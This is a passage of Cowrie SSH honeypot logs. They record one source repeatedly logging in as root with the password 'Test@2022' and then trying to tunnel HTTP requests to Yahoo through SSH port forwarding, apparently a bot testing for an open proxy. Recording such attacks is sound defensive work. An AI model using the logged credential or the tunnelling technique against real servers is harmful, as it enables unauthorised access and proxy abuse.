tr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.535472Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.818069Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":20026,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:20026","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.876628Z","session":"0260bb0be141"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:18.933744Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":31245,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:31245","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.091140Z","session":"0260bb0be141"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.147930Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.205492Z","src_ip":"213.209.150.239","session":"0260bb0be141"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46686,"dst_ip":"1.2.3.4","dst_port":22,"session":"34f0e0d4e8c0","protocol":"ssh","message":"New connection: 213.209.150.239:46686 (1.2.3.4:22) [session: 34f0e0d4e8c0]","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.261354Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.262478Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.319441Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.602237Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":24158,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:24158","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.659906Z","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.716768Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":10952,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:10952","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.871104Z","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.927975Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:19.985609Z","src_ip":"213.209.150.239","session":"34f0e0d4e8c0"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46756,"dst_ip":"1.2.3.4","dst_port":22,"session":"50664947b7bc","protocol":"ssh","message":"New connection: 213.209.150.239:46756 (1.2.3.4:22) [session: 50664947b7bc]","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.040845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.042031Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.098930Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.380476Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":19773,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:19773","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.437993Z","session":"50664947b7bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.494774Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"src_ip":"213.209.150.239","src_port":4162,"message":"direct-tcp connection request to 2001:4998:24:120d::1:0:80 from 127.0.0.1:4162","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.651052Z","session":"50664947b7bc"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:0","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:0:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.707663Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.765413Z","src_ip":"213.209.150.239","session":"50664947b7bc"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46813,"dst_ip":"1.2.3.4","dst_port":22,"session":"1255b416eca4","protocol":"ssh","message":"New connection: 213.209.150.239:46813 (1.2.3.4:22) [session: 1255b416eca4]","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.821604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.822259Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:20.879080Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.161539Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":2120,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:2120","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.219129Z","session":"1255b416eca4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.276012Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"src_ip":"213.209.150.239","src_port":12437,"message":"direct-tcp connection request to 2001:4998:124:1507::f000:80 from 127.0.0.1:12437","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.431054Z","session":"1255b416eca4"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:124:1507::f000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:124:1507::f000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.487856Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.545287Z","src_ip":"213.209.150.239","session":"1255b416eca4"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46879,"dst_ip":"1.2.3.4","dst_port":22,"session":"d10210ad2a14","protocol":"ssh","message":"New connection: 213.209.150.239:46879 (1.2.3.4:22) [session: d10210ad2a14]","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.600733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.601685Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.658070Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.940128Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"213.209.150.239","src_port":23697,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:23697","sensor":"my-vps","timestamp":"2025-08-26T01:07:21.998939Z","session":"d10210ad2a14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.055410Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"213.209.150.239","src_port":2174,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:2174","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.210825Z","session":"d10210ad2a14"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.267165Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.324388Z","src_ip":"213.209.150.239","session":"d10210ad2a14"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":46951,"dst_ip":"1.2.3.4","dst_port":22,"session":"66e2c5f89b19","protocol":"ssh","message":"New connection: 213.209.150.239:46951 (1.2.3.4:22) [session: 66e2c5f89b19]","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.380135Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.381320Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.437924Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.719924Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.25","dst_port":80,"src_ip":"213.209.150.239","src_port":11485,"message":"direct-tcp connection request to 74.6.143.25:80 from 127.0.0.1:11485","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.777256Z","session":"66e2c5f89b19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.25","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.25:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.834047Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":4625,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:4625","sensor":"my-vps","timestamp":"2025-08-26T01:07:22.991189Z","session":"66e2c5f89b19"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T01:07:23.048039Z","src_ip":"213.209.150.239","session":"66e2c5f89b19"}
